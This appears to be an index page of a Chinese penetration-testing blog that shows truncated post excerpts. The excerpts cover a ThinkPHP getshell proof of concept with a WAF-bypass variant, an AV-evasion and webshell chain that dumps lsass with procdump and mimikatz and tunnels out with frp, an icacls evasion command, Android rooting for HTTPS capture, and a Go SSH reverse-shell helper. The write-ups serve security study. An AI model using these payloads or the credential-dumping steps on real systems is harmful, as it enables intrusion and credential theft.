卡卡罗特取西经

分享一个ThinkPHP GetShell时WAF绕过的小技巧 POC以如下POC为例 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36Content-Type: application/x-www-form-urlencodeds=file_put_contents('system.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert 可能绕过WAF的POC为 123456POST /?s=captcha&test=-1 HTTP/1.1Host: 127.0.0.1User-Agent: M ...

背景一个shiro命令执行并且有回显的口子，直接打各类内存马均失败，powershell一句话上线CS失败，查看进程发现有360、火绒，考虑到内存马不是我的研究方向，从文件下载方向突破 0x01 突破常规的文件下载方式bitsadmin、certutil、ftp等均被拦截，掏出储备的一个免杀的文件下载方式，可成功下载exe文件，尝试下载免杀远控并执行，发现无法执行（原因未知），改为下载魔改过的免杀冰蝎到对应的web目录下，成功连接webshell 0x02 再突破连接上webshell后，尝试执行远控仍旧失败，看来这条路行不通了，上传procdump抓取lsass的内存，想要下载到本地解密，发现不能下载（猜测可能是AV给拦截了），重新梳理下场景，想到既然是shiro的站点，那可以通过web服务下载文件，将文件移动到web目录后成功下载，随后通过mimikatz解出密码，密码真TM复杂啊，上传魔改过的免杀frp，建立隧道后，远程桌面成功连接 0x03 优化远程桌面连接后，发现屏幕字体非常非常小，应该是我本机虚拟机的分辨率太高导致的，此时可以先修改本机的屏幕分辨率，再远程桌面连接后大小刚刚 ...

0x01 前言看到一个免杀下载的方式，其中包含这样一条命令 1icacls %cd% /deny %username%:(OI)(CI)(DE,DC) 之前没接触过icacls，通过这篇笔记好好学习一下 0x02 介绍icacls：修改文件（文件夹）的权限 icacls是cacls和xcacls的增强版（但我在win10中搜索了一下，只搜到cacls，没搜到xcacls） windows中文件（文件夹）的权限分为2种：继承的权限（inherit permission）、明确设置的权限（explicit permission） 可通过执行icacls.exe %cd%来查看当前目录的权限 123456C:\Users\admin\Desktop>icacls.exe %cd%C:\Users\admin\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) DESKTOP-T86MV1G\ ...

0x01 前言接到一个Android APP渗透的任务，尝试用模拟器抓包发现闪退，看来反模拟器，手里有一台手机，型号是OPPO A57 5G，系统是ColorOS 14，手机和电脑在同一WiFi下，安装好burp证书，配置好代理，尝试抓包，发现无法抓取https包，好吧，开启折腾之旅 oppo安装证书https://www.cnblogs.com/tianpin/p/17503604.html 0x02 手机降级查阅相关资料得知，安卓7.0开始，想抓https包需要将证书装到系统证书目录下，想装到系统证书目录下需要root权限，现在问题变成如何root 之前手欠将ColorOS升级到14，我们都知道版本越高越不利于root，所以第一步是降级，ColorOS官方规定，降级需要一级一级降，不能一次降多级，所以我们要先降到ColorOS 13，再降到ColorOS 12，由于ColorOS最低只能降到手机出厂时的系统，我这边最低只能降到ColorOS 12 ColorOS 14降级到ColorOS 13https://www.ithome.com/0/742/497.htmColorOS ...

0x01 应用场景一个命令执行的口子 主机不出网 当前是nobody权限，web目录是root权限，写webshell没权限 通过一个ctf技巧搞了一个webshell，能上传文件但是不能执行命令 通过webshell将fscan上传到/tmp目录下，通过入口的命令执行漏洞执行fscan，发现内网有ssh弱口令 0x02 解决方案已知连接ssh的同时可以执行命令当时的想法是连接ssh，然后执行命令反弹shell，但是连接ssh需要交互式shell，第一时间想到expect，经测试主机上没有expect，然后想到通过python中的pexpect去做这件事，发现目标中的python缺少依赖，如果上传python依赖到对应的依赖库目录太麻烦了，最后想到用go去实现，代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950package mainimport ("bytes""fmt""log"&q ...

0x01 前言之前有段时间在搞小程序开发，搞来搞去最终放弃了，不过收获还是蛮多的，记得刚入行安全时，一直想学开发，总觉得不懂开发就搞不好安全，现在也算圆了这个执念，学习开发对安全是有帮助的，不过现在想对那时的自己说一句，不用专门学开发也可以把安全搞得好 0x02 简介一个简易的多用户微博系统，每个人都可以在上面留言，欢迎大家留言，地址：https://static-mp-5cacf972-c2bb-47de-9b31-244f0c9e5038.next.bspapp.com/article/#/ 截图如下：

程序流程如下 之前做红队时自己开发的工具，代码完全开源到GitHub，地址：https://github.com/ybdt/RuiningGather-Python

0x01 成果可下载15.3.2.62919（截止到2024.04.03的最新版）到12.5.1.44969之间的任意版本，如下图更旧的版本不能下载，原因见下文 0x02 起源想用旧版本向日葵测试一个功能，发现官网只提供最新版下载，故研究下如何下载旧版本 0x03 过程下载页面点击下载后，burp抓包，依次筛选每个请求包，发现如下请求包最像下载链接 如图可看到，根据参数versionid指定版本，试了下2225、2224都返回404，看来不是每个数字都有对应版本，写个python脚本生成1到2226的字典，请求包扔到Intruder中进行爆破，发现如上请求id返回302 ok，现在我们可以根据id下载对应版本 0x04 遗憾经测试，版本SunloginClient_12.5.0.44227_x64.exe及之前的版本，下载后会返回404，猜测可能官方给删除了

0x01 目标熟悉软件简介：微擎是宿州市微擎云计算有限公司开发的一款免费开源的微信公众号管理系统 官网地址：https://www.w7.cc/ 开发文档https://wiki.w7.com/document/35/370中提到，源代码位于：https://gitee.com/we7coreteam/pros 根据在线文档https://wiki.w7.com/document中的更新公告，最新版是2.7.50 根据开源代码库https://gitee.com/we7coreteam/pros/tree/master/upgrade中的记录，最新版是2.7.9 网站搭建好后，在底部又发现最新版是2.7.108，有点奇怪 0x02 环境搭建搭建微擎的过程中踩了很多坑，以下2个坑想搭建的师傅有个心理准备： 1 微擎的版本挺错乱的，下载后是2.7.108，结果搭建完成后底部却显示2.7.94，同样其他版本也是，下载时是一个版本，搭建后又是另一个版本 2 在官网上已经不再提供离线安装的版本，而且提供的安装包https://gitee.com/we7coreteam/pros也是很多功 ...

0x01 ThinkPHP版本梳理截止到2022年10月17日6.0.x系列最新版是V6.0.13（2022年07月15日发布）5.1.x系列最新版是V5.1.41（2021年01月12日发布）5.0.x系列最新版是V5.0.24（2019年01月11日发布） 作者在2019年02月14日发布V5.2 RC1后，没有再发布过V5.2系列，而是在2019年04月22日发布V6.0.0 RC2，看样子V6.0系列接替了V5.2系列 thinkphp6及以上，安装需要使用composer 0x02 Mac下PHP集成环境踩坑php集成环境，之前在windows下用phpstudy，自从换了mac，什么都要重新来。。 首选使用破解版MAMP Pro，但我这边下载后安装报错（后经查阅，安装破解版MAMP Pro可能需要关闭SIP，SIP即macOS的一种保护机制），不想关闭SIP，放弃这个方案，也试过MAMP免费版，但不支持切换php版本，这个不能忍，尝试phpstudy mac版，发现phpstudy mac版支持切换php版本，其他功能界面也和phpstudy windows版基本一致， ...